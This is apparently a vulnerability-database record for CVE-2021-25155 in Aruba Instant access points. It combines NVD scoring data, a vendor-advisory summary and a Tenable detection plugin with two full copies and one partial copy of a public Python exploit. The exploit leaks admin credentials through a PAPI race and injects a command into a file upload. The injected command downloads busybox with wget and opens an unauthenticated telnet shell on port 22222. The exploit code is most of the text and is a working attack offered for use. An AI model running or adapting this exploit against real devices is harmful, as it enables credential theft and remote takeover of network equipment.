Description
A remote arbitrary file modification vulnerability was discovered in some Aruba Instant Access Point (IAP) products in version(s): Aruba Instant 6.4.x: 6.4.4.8-4.2.4.17 and below; Aruba Instant 6.5.x: 6.5.4.18 and below; Aruba Instant 8.3.x: 8.3.0.14 and below; Aruba Instant 8.5.x: 8.5.0.11 and below; Aruba Instant 8.6.x: 8.6.0.6 and below; Aruba Instant 8.7.x: 8.7.1.0 and below. Aruba has released patches for Aruba Instant that address this security vulnerability.
Affected Software
Related
{"id": "CVE-2021-25155", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-25155", "description": "A remote arbitrary file modification vulnerability was discovered in some Aruba Instant Access Point (IAP) products in version(s): Aruba Instant 6.4.x: 6.4.4.8-4.2.4.17 and below; Aruba Instant 6.5.x: 6.5.4.18 and below; Aruba Instant 8.3.x: 8.3.0.14 and below; Aruba Instant 8.5.x: 8.5.0.11 and below; Aruba Instant 8.6.x: 8.6.0.6 and below; Aruba Instant 8.7.x: 8.7.1.0 and below. Aruba has released patches for Aruba Instant that address this security vulnerability.", "published": "2021-03-30T01:15:00", "modified": "2022-04-22T18:20:00", "epss": [{"cve": "CVE-2021-25155", "epss": 0.00564, "percentile": 0.74535, "modified": "2023-05-27"}], "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 8.5}, "severity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 9.2, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 1.2, "impactScore": 5.2}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-25155", "reporter": "security-alert@hpe.com", "references": ["https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-007.txt", "https://cert-portal.siemens.com/productcert/pdf/ssa-723417.pdf", "http://packetstormsecurity.com/files/163524/Aruba-Instant-8.7.1.0-Arbitrary-File-Modification.html", "http://packetstormsecurity.com/files/163522/Aruba-Instant-IAP-Remote-Code-Execution.html"], "cvelist": ["CVE-2021-25155"], "immutableFields": [], "lastseen": "2023-05-27T14:29:05", "viewCount": 101, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0504"]}, {"type": "exploitdb", "idList": ["EDB-ID:50133"]}, {"type": "ics", "idList": ["ICSA-21-131-14"]}, {"type": "nessus", "idList": ["TENABLE_OT_SIEMENS_CVE-2021-25155.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163522", "PACKETSTORM:163524"]}, {"type": "zdt", "idList": ["1337DAY-ID-36559", "1337DAY-ID-36560"]}]}, "score": {"value": 3.7, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0504"]}, {"type": "exploitdb", "idList": ["EDB-ID:50133"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163522", "PACKETSTORM:163524"]}, {"type": "zdt", "idList": ["1337DAY-ID-36559", "1337DAY-ID-36560"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2021-25155", "epss": 0.00564, "percentile": 0.74469, "modified": "2023-05-07"}], "vulnersScore": 3.7}, "_state": {"dependencies": 1685209315, "score": 1685197916, "affected_software_major_version": 0, "epss": 0}, "_internal": {"score_hash": "7db09db25f2277a16638ec5c1e44908b"}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/o:arubanetworks:instant:6.4.4.8-4.2.4.18"], "cpe23": ["cpe:2.3:o:arubanetworks:instant:6.4.4.8-4.2.4.18:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-noinfo"], "affectedSoftware": [{"cpeName": "arubanetworks:instant", "version": "6.4.4.8-4.2.4.18", "operator": "le", "name": "arubanetworks instant"}, {"cpeName": "arubanetworks:instant", "version": "6.5.4.19", "operator": "lt", "name": "arubanetworks instant"}, {"cpeName": "arubanetworks:instant", "version": "8.3.0.15", "operator": "lt", "name": "arubanetworks instant"}, {"cpeName": "arubanetworks:instant", "version": "8.7.1.1", "operator": "lt", "name": "arubanetworks instant"}, {"cpeName": "arubanetworks:instant", "version": "8.5.0.12", "operator": "lt", "name": "arubanetworks instant"}, {"cpeName": "arubanetworks:instant", "version": "8.6.0.7", "operator": "lt", "name": "arubanetworks instant"}, {"cpeName": "siemens:scalance_w1750d_firmware", "version": "8.7.1.3", "operator": "lt", "name": "siemens scalance w1750d firmware"}], "affectedConfiguration": [{"name": "siemens scalance w1750d", "cpeName": "siemens:scalance_w1750d", "version": "-", "operator": "eq"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:arubanetworks:instant:6.4.4.8-4.2.4.18:*:*:*:*:*:*:*", "versionStartIncluding": "6.4.0.0", "versionEndIncluding": "6.4.4.8-4.2.4.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:o:arubanetworks:instant:6.5.4.19:*:*:*:*:*:*:*", "versionStartIncluding": "6.5.0.0", "versionEndExcluding": "6.5.4.19", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:o:arubanetworks:instant:8.3.0.15:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.0.0", "versionEndExcluding": "8.3.0.15", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:o:arubanetworks:instant:8.7.1.1:*:*:*:*:*:*:*", "versionStartIncluding": "8.7.0.0", "versionEndExcluding": "8.7.1.1", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:o:arubanetworks:instant:8.5.0.12:*:*:*:*:*:*:*", "versionStartIncluding": "8.5.0.0", "versionEndExcluding": "8.5.0.12", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:o:arubanetworks:instant:8.6.0.7:*:*:*:*:*:*:*", "versionStartIncluding": "8.6.0.0", "versionEndExcluding": "8.6.0.7", "cpe_name": []}]}, {"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:siemens:scalance_w1750d_firmware:8.7.1.3:*:*:*:*:*:*:*", "versionStartIncluding": "8.7.0", "versionEndExcluding": "8.7.1.3", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:h:siemens:scalance_w1750d:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}]}, "extraReferences": [{"url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-007.txt", "name": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-007.txt", "refsource": "MISC", "tags": ["Vendor Advisory"]}, {"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-723417.pdf", "name": "https://cert-portal.siemens.com/productcert/pdf/ssa-723417.pdf", "refsource": "CONFIRM", "tags": ["Patch", "Third Party Advisory"]}, {"url": "http://packetstormsecurity.com/files/163524/Aruba-Instant-8.7.1.0-Arbitrary-File-Modification.html", "name": "http://packetstormsecurity.com/files/163524/Aruba-Instant-8.7.1.0-Arbitrary-File-Modification.html", "refsource": "MISC", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "http://packetstormsecurity.com/files/163522/Aruba-Instant-IAP-Remote-Code-Execution.html", "name": "http://packetstormsecurity.com/files/163522/Aruba-Instant-IAP-Remote-Code-Execution.html", "refsource": "MISC", "tags": ["Third Party Advisory", "VDB Entry"]}], "product_info": [{"vendor": "Siemens", "product": "Scalance_w1750d_firmware"}, {"vendor": "Arubanetworks", "product": "Instant"}], "solutions": [], "workarounds": [], "impacts": [], "problemTypes": [{"descriptions": [{"description": "remote arbitrary file modification", "lang": "en", "type": "text"}]}], "exploits": []}
{"checkpoint_advisories": [{"lastseen": "2022-02-16T19:37:58", "description": "A remote code execution vulnerability exists in Aruba Instant Access Point. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.2}, "published": "2021-09-05T00:00:00", "type": "checkpoint_advisories", "title": "Aruba Instant Access Point Remote Code Execution (CVE-2021-25155)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 9.2, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25155"], "modified": "2021-09-05T00:00:00", "id": "CPAI-2021-0504", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "nessus": [{"lastseen": "2023-05-17T16:44:59", "description": "A remote arbitrary file modification vulnerability was discovered in some Aruba Instant Access Point (IAP) products in version(s): Aruba Instant 6.4.x: 6.4.4.8-4.2.4.17 and below; Aruba Instant 6.5.x:\n6.5.4.18 and below; Aruba Instant 8.3.x: 8.3.0.14 and below; Aruba Instant 8.5.x: 8.5.0.11 and below; Aruba Instant 8.6.x: 8.6.0.6 and below; Aruba Instant 8.7.x: 8.7.1.0 and below. Aruba has released patches for Aruba Instant that address this security vulnerability.\n\nThis plugin only works with Tenable.ot.\nPlease visit https://www.tenable.com/products/tenable-ot for more information.", "cvss3": {}, "published": "2023-04-11T00:00:00", "type": "nessus", "title": "Siemens (CVE-2021-25155)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-25155"], "modified": "2023-04-11T00:00:00", "cpe": ["cpe:/o:siemens:scalance_w1750d_firmware"], "id": "TENABLE_OT_SIEMENS_CVE-2021-25155.NASL", "href": "https://www.tenable.com/plugins/ot/501026", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(501026);\n script_version(\"1.0\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/11\");\n\n script_cve_id(\"CVE-2021-25155\");\n\n script_name(english:\"Siemens (CVE-2021-25155)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote OT asset is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote arbitrary file modification vulnerability was discovered in\nsome Aruba Instant Access Point (IAP) products in version(s): Aruba\nInstant 6.4.x: 6.4.4.8-4.2.4.17 and below; Aruba Instant 6.5.x:\n6.5.4.18 and below; Aruba Instant 8.3.x: 8.3.0.14 and below; Aruba\nInstant 8.5.x: 8.5.0.11 and below; Aruba Instant 8.6.x: 8.6.0.6 and\nbelow; Aruba Instant 8.7.x: 8.7.1.0 and below. Aruba has released\npatches for Aruba Instant that address this security vulnerability.\n\nThis plugin only works with Tenable.ot.\nPlease visit https://www.tenable.com/products/tenable-ot for more information.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-007.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cert-portal.siemens.com/productcert/pdf/ssa-723417.pdf\");\n # http://packetstormsecurity.com/files/163524/Aruba-Instant-8.7.1.0-Arbitrary-File-Modification.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bd96ffb0\");\n # http://packetstormsecurity.com/files/163522/Aruba-Instant-IAP-Remote-Code-Execution.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?574bd0ab\");\n script_set_attribute(attribute:\"solution\", value:\n\"Refer to the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-25155\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/04/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:siemens:scalance_w1750d_firmware\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"former\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Tenable.ot\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"tenable_ot_api_integration.nasl\");\n script_require_keys(\"Tenable.ot/Siemens\");\n\n exit(0);\n}\n\n\ninclude('tenable_ot_cve_funcs.inc');\n\nget_kb_item_or_exit('Tenable.ot/Siemens');\n\nvar asset = tenable_ot::assets::get(vendor:'Siemens');\n\nvar vuln_cpes = {\n \"cpe:/o:siemens:scalance_w1750d_firmware\" :\n {\"versionEndExcluding\" : \"8.7.1.3\", \"family\" : \"SCALANCEW\"}\n};\n\ntenable_ot::cve::compare_and_report(asset:asset, cpes:vuln_cpes, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2021-07-16T15:02:16", "description": "", "cvss3": {}, "published": "2021-07-16T00:00:00", "type": "packetstorm", "title": "Aruba Instant 8.7.1.0 Arbitrary File Modification", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-25155"], "modified": "2021-07-16T00:00:00", "id": "PACKETSTORM:163524", "href": "https://packetstormsecurity.com/files/163524/Aruba-Instant-8.7.1.0-Arbitrary-File-Modification.html", "sourceData": "`# Exploit Title: Aruba Instant 8.7.1.0 - Arbitrary File Modification \n# Date: 15/07/2021 \n# Exploit Author: Gr33nh4t \n# Vendor Homepage: https://www.arubanetworks.com/ \n# Version: \n# Aruba Instant 6.4.x: 6.4.4.8-4.2.4.17 and below \n# Aruba Instant 6.5.x: 6.5.4.18 and below \n# Aruba Instant 8.3.x: 8.3.0.14 and below \n# Aruba Instant 8.5.x: 8.5.0.11 and below \n# Aruba Instant 8.6.x: 8.6.0.6 and below \n# Aruba Instant 8.7.x: 8.7.1.0 and below \n# Tested on: Aruba Instant \n# CVE : CVE-2021-25155 \n \nimport socket \nimport sys \nimport struct \nimport time \nimport threading \nimport urllib3 \nimport re \nimport telnetlib \nimport xml.etree.ElementTree as ET \nimport requests \n \nurllib3.disable_warnings() \n \nCONTINUE_RACE = True \nSNPRINTF_CREATEFILE_MAX_LENGTH = 245 \n \n \ndef race_papi_message(ip): \n \nglobal CONTINUE_RACE \n \npayload = b\"\\x49\\x72\" \npayload += b\"\\x00\\x03\" \npayload += b\"\\x7F\\x00\\x00\\x01\" \npayload += b\"\\x7F\\x00\\x00\\x01\" \npayload += b\"\\x00\\x00\" \npayload += b\"\\x00\\x00\" \npayload += b\"\\x3B\\x7E\" \npayload += b\"\\x41\\x41\" \npayload += b\"\\x04\\x22\" \npayload += b\"\\x00\\x00\" \npayload += b\"\\x02\\x00\" \npayload += b\"\\x00\\x00\" \npayload += b\"\\x00\" * 12 * 4 \ntext_to_send = bytes() \nfor i in \"msg_ref 3000 /tmp/cfg-plaintext\\x00\": \ntext_to_send += struct.pack(\"B\", int(ord(i)) ^ 0x93) \n \npacket = payload + text_to_send \n \nwhile CONTINUE_RACE: \ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \ns.connect((ip, 8211)) \ns.send(packet) \ns.close() \ntime.sleep(0.004) \n \n \ndef find_credentials(text): \nres = re.search(\"mgmt-user .*\", text)[0] \nres = res.split(\" \") \nreturn (res[1], res[2]) \n \n \ndef login(ip, username, password): \nlogin_data = { \n\"opcode\": \"login\", \n\"user\": username, \n\"passwd\": password, \n\"refresh\": \"false\", \n} \nres = requests.post(\"https://{}:4343/swarm.cgi\".format(ip), data=login_data, verify=False) \n \nroot = ET.fromstring(res.text) \nreturn root.find(\"./data[@name='sid']\").text \n \n \ndef create_directory(ip, sid): \nrequest_data = \"opcode=config&ip=127.0.0.1&cmd='end%20%0Aapply%20cplogo-install%20\\\"https://{ip}:4343/%09--directory-prefix%09/tmp/oper_/%09#\\\"'&refresh=false&sid={sid}&nocache=0.23759201691110987&=\".format(ip=ip, sid=sid) \nres = requests.post(\"https://{}:4343/swarm.cgi\".format(ip), data=request_data, verify=False) \nif \"/tmp/oper_\" in res.text: \nprint(\"[+] Successfully created /tmp/oper_/ directory :)\") \nreturn True \nelse: \nprint(\"[-] Failed creating /tmp/oper_/ directory\") \nreturn False \n \n \ndef prepare_upload_id(command): \nbase_payload = \"/../../etc/httpd/\" \ncmd_len = len(command) \npadding_len = SNPRINTF_CREATEFILE_MAX_LENGTH - cmd_len - len(base_payload) - 8 # for the .gz at the end and the '; + spaces \nif padding_len < 0: \nprint(\"[-] Command too long length:{}\".format(padding_len)) \nexit(1) \nreturn base_payload + ('/' * (padding_len - 1)) + 'A' + \"'; {} #.gz\".format(command) \n \n \ndef create_file(ip, command): \nupload_id = prepare_upload_id(command) \nrequests.post(\"https://{}:4343/swarm.cgi\".format(ip), data={\"opcode\": \"cp-upload\", \"file_type\": \"logo\", \"upload_id\": upload_id, \"sid\": \"basdfbsfbsfb\"}, files={\"file\": \"test2\"}, verify=False) \n \n \ndef run_command(ip, command): \nprint(\"[*] Executing telnet\") \ncommand = command.replace(\"?\", \"%3F\") \ncommand = command.replace(\"#\", \"\\\\\\\\x23\") \ns = requests.Session() \nreq = requests.Request('GET', \"https://{}:4343/A';%20{}%20%23\".format(ip, command)) \nprep = req.prepare() \nresponse = s.send(prep, verify=False) \nreturn response.text \n \ndef build_command(command): \ncommand = command.replace(\"/\", \"\\\\\\\\x2F\") \ncommand = command.replace(\"#\", \"\\\\\\\\x23\") \ncommand = command.replace(\"\\\"\", \"\\\\\\\"\") \ncommand = command.replace(\"`\", \"\\`\") \nfinal_command = \"echo -e \\\"{}\\\"|sh\".format(command) \nreturn final_command \n \ndef telnet_connect(router_ip): \nprint(\"[*] Connecting to telnet\") \nwith telnetlib.Telnet(router_ip, 22222) as tn: \ntn.write(b\"rm /etc/httpd/A*sh*.gz\\n\") \ntn.interact() \n \n \ndef main(): \n \nglobal CONTINUE_RACE \n \nip = sys.argv[1] \n \nprint(\"[*] Starting the PAPI race thread\") \npapi_thread = threading.Thread(target=race_papi_message, args=(ip, )) \npapi_thread.start() \n \nwhile CONTINUE_RACE: \ntime.sleep(0.1) \nres = requests.get(\"https://{}:4343/swarm.cgi?opcode=single_signon&key=AAAA&ip=%20127.0.0.1\".format(ip), timeout=3, verify=False) \nif \"version\" in res.text: \nprint(\"[+] Successfully leaked the password from config\") \nCONTINUE_RACE = False \n \nfile_content = re.findall(\"var SESSION_ID = '(.*?)';\", res.text, re.S)[0] \nuser, password = find_credentials(file_content) \n \nprint(\"[+] Successfully extracted username: {} and password: {}\".format(user, password)) \nsid = login(ip, user, password) \nprint(\"[*] SID generated: {}\".format(sid)) \n \ncommand = \"\"\"cd /tmp;/usr/sbin/wget https://busybox.net/downloads/binaries/1.21.1/busybox-armv5l --no-check-certificate -O telnetd;chmod +x telnetd;./telnetd -p 22222 -l sh\"\"\" \nfinal_command = build_command(command) \n \nif not create_directory(ip, sid): \nreturn \n \nprint(\"[*] Creating malicious file in /etc/httpd/\") \ncreate_file(ip, final_command) \nprint(run_command(ip, final_command)) \ntime.sleep(1) # Sleeping waiting for telnet. \ntelnet_connect(ip) \n \n \nif __name__ == \"__main__\": \nmain() \n \n`\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/163524/arubainstant8710-filemodification.txt"}, {"lastseen": "2021-07-16T15:03:02", "description": "", "cvss3": {}, "published": "2021-07-16T00:00:00", "type": "packetstorm", "title": "Aruba Instant (IAP) Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-25155", "CVE-2021-25156", "CVE-2021-25157", "CVE-2021-25158", "CVE-2021-25159", "CVE-2021-25160", "CVE-2021-25161", "CVE-2021-25162"], "modified": "2021-07-16T00:00:00", "id": "PACKETSTORM:163522", "href": "https://packetstormsecurity.com/files/163522/Aruba-Instant-IAP-Remote-Code-Execution.html", "sourceData": "`import socket \nimport sys \nimport struct \nimport time \nimport threading \nimport urllib3 \nimport re \nimport telnetlib \nimport xml.etree.ElementTree as ET \nimport requests \n \nurllib3.disable_warnings() \n \nCONTINUE_RACE = True \nSNPRINTF_CREATEFILE_MAX_LENGTH = 245 \n \n \ndef race_papi_message(ip): \n \nglobal CONTINUE_RACE \n \npayload = b\"\\x49\\x72\" \npayload += b\"\\x00\\x03\" \npayload += b\"\\x7F\\x00\\x00\\x01\" \npayload += b\"\\x7F\\x00\\x00\\x01\" \npayload += b\"\\x00\\x00\" \npayload += b\"\\x00\\x00\" \npayload += b\"\\x3B\\x7E\" \npayload += b\"\\x41\\x41\" \npayload += b\"\\x04\\x22\" \npayload += b\"\\x00\\x00\" \npayload += b\"\\x02\\x00\" \npayload += b\"\\x00\\x00\" \npayload += b\"\\x00\" * 12 * 4 \ntext_to_send = bytes() \nfor i in \"msg_ref 3000 /tmp/cfg-plaintext\\x00\": \ntext_to_send += struct.pack(\"B\", int(ord(i)) ^ 0x93) \n \npacket = payload + text_to_send \n \nwhile CONTINUE_RACE: \ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \ns.connect((ip, 8211)) \ns.send(packet) \ns.close() \ntime.sleep(0.004) \n \n \ndef find_credentials(text): \nres = re.search(\"mgmt-user .*\", text)[0] \nres = res.split(\" \") \nreturn (res[1], res[2]) \n \n \ndef login(ip, username, password): \nlogin_data = { \n\"opcode\": \"login\", \n\"user\": username, \n\"passwd\": password, \n\"refresh\": \"false\", \n} \nres = requests.post(\"https://{}:4343/swarm.cgi\".format(ip), data=login_data, verify=False) \n \nroot = ET.fromstring(res.text) \nreturn root.find(\"./data[@name='sid']\").text \n \n \ndef create_directory(ip, sid): \nrequest_data = \"opcode=config&ip=127.0.0.1&cmd='end%20%0Aapply%20cplogo-install%20\\\"https://{ip}:4343/%09--directory-prefix%09/tmp/oper_/%09#\\\"'&refresh=false&sid={sid}&nocache=0.23759201691110987&=\".format(ip=ip, sid=sid) \nres = requests.post(\"https://{}:4343/swarm.cgi\".format(ip), data=request_data, verify=False) \nif \"/tmp/oper_\" in res.text: \nprint(\"[+] Successfully created /tmp/oper_/ directory :)\") \nreturn True \nelse: \nprint(\"[-] Failed creating /tmp/oper_/ directory\") \nreturn False \n \n \ndef prepare_upload_id(command): \nbase_payload = \"/../../etc/httpd/\" \ncmd_len = len(command) \npadding_len = SNPRINTF_CREATEFILE_MAX_LENGTH - cmd_len - len(base_payload) - 8 # for the .gz at the end and the '; + spaces \nif padding_len < 0: \nprint(\"[-] Command too long length:{}\".format(padding_len)) \nexit(1) \nreturn base_payload + ('/' * (padding_len - 1)) + 'A' + \"'; {} #.gz\".format(command) \n \n \ndef create_file(ip, command): \nupload_id = prepare_upload_id(command) \nrequests.post(\"https://{}:4343/swarm.cgi\".format(ip), data={\"opcode\": \"cp-upload\", \"file_type\": \"logo\", \"upload_id\": upload_id, \"sid\": \"basdfbsfbsfb\"}, files={\"file\": \"test2\"}, verify=False) \n \n \ndef run_command(ip, command): \nprint(\"[*] Executing telnet\") \ncommand = command.replace(\"?\", \"%3F\") \ncommand = command.replace(\"#\", \"\\\\\\\\x23\") \ns = requests.Session() \nreq = requests.Request('GET', \"https://{}:4343/A';%20{}%20%23\".format(ip, command)) \nprep = req.prepare() \nresponse = s.send(prep, verify=False) \nreturn response.text \n \ndef build_command(command): \ncommand = command.replace(\"/\", \"\\\\\\\\x2F\") \ncommand = command.replace(\"#\", \"\\\\\\\\x23\") \ncommand = command.replace(\"\\\"\", \"\\\\\\\"\") \ncommand = command.replace(\"`\", \"\\`\") \nfinal_command = \"echo -e \\\"{}\\\"|sh\".format(command) \nreturn final_command \n \ndef telnet_connect(router_ip): \nprint(\"[*] Connecting to telnet\") \nwith telnetlib.Telnet(router_ip, 22222) as tn: \ntn.write(b\"rm /etc/httpd/A*sh*.gz\\n\") \ntn.interact() \n \n \ndef main(): \n \nglobal CONTINUE_RACE \n \nip = sys.argv[1] \n \nprint(\"[*] Starting the PAPI race thread\") \npapi_thread = threading.Thread(target=race_papi_message, args=(ip, )) \npapi_thread.start() \n \nwhile CONTINUE_RACE: \ntime.sleep(0.1) \nres = requests.get(\"https://{}:4343/swarm.cgi?opcode=single_signon&key=AAAA&ip=%20127.0.0.1\".format(ip), timeout=3, verify=False) \nif \"version\" in res.text: \nprint(\"[+] Successfully leaked the password from config\") \nCONTINUE_RACE = False \n \nfile_content = re.findall(\"var SESSION_ID = '(.*?)';\", res.text, re.S)[0] \nuser, password = find_credentials(file_content) \n \nprint(\"[+] Successfully extracted username: {} and password: {}\".format(user, password)) \nsid = login(ip, user, password) \nprint(\"[*] SID generated: {}\".format(sid)) \n \ncommand = \"\"\"cd /tmp;/usr/sbin/wget https://busybox.net/downloads/binaries/1.21.1/busybox-armv5l --no-check-certificate -O telnetd;chmod +x telnetd;./telnetd -p 22222 -l sh\"\"\" \nfinal_command = build_command(command) \n \nif not create_directory(ip, sid): \nreturn \n \nprint(\"[*] Creating malicious file in /etc/httpd/\") \ncreate_file(ip, final_command) \nprint(run_command(ip, final_command)) \ntime.sleep(1) # Sleeping waiting for telnet. \ntelnet_connect(ip) \n \n \nif __name__ == \"__main__\": \nmain() \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/163522/arubainstant-exec.txt"}], "zdt": [{"lastseen": "2023-05-27T14:46:24", "description": "", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-07-16T00:00:00", "type": "zdt", "title": "Aruba Instant 8.7.1.0 - Arbitrary File Modification Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25155"], "modified": "2021-07-16T00:00:00", "id": "1337DAY-ID-36559", "href": "https://0day.today/exploit/description/36559", "sourceData": "# Exploit Title: Aruba Instant 8.7.1.0 - Arbitrary File Modification\n# Exploit Author: Gr33nh4t\n# Vendor Homepage: https://www.arubanetworks.com/\n# Version:\n# Aruba Instant 6.4.x: 6.4.4.8-4.2.4.17 and below\n# Aruba Instant 6.5.x: 6.5.4.18 and below\n# Aruba Instant 8.3.x: 8.3.0.14 and below\n# Aruba Instant 8.5.x: 8.5.0.11 and below\n# Aruba Instant 8.6.x: 8.6.0.6 and below\n# Aruba Instant 8.7.x: 8.7.1.0 and below\n# Tested on: Aruba Instant\n# CVE : CVE-2021-25155\n\nimport socket\nimport sys\nimport struct\nimport time\nimport threading\nimport urllib3\nimport re\nimport telnetlib\nimport xml.etree.ElementTree as ET\nimport requests\n\nurllib3.disable_warnings()\n\nCONTINUE_RACE = True\nSNPRINTF_CREATEFILE_MAX_LENGTH = 245\n\n\ndef race_papi_message(ip):\n\n global CONTINUE_RACE\n\n payload = b\"\\x49\\x72\"\n payload += b\"\\x00\\x03\"\n payload += b\"\\x7F\\x00\\x00\\x01\"\n payload += b\"\\x7F\\x00\\x00\\x01\"\n payload += b\"\\x00\\x00\"\n payload += b\"\\x00\\x00\"\n payload 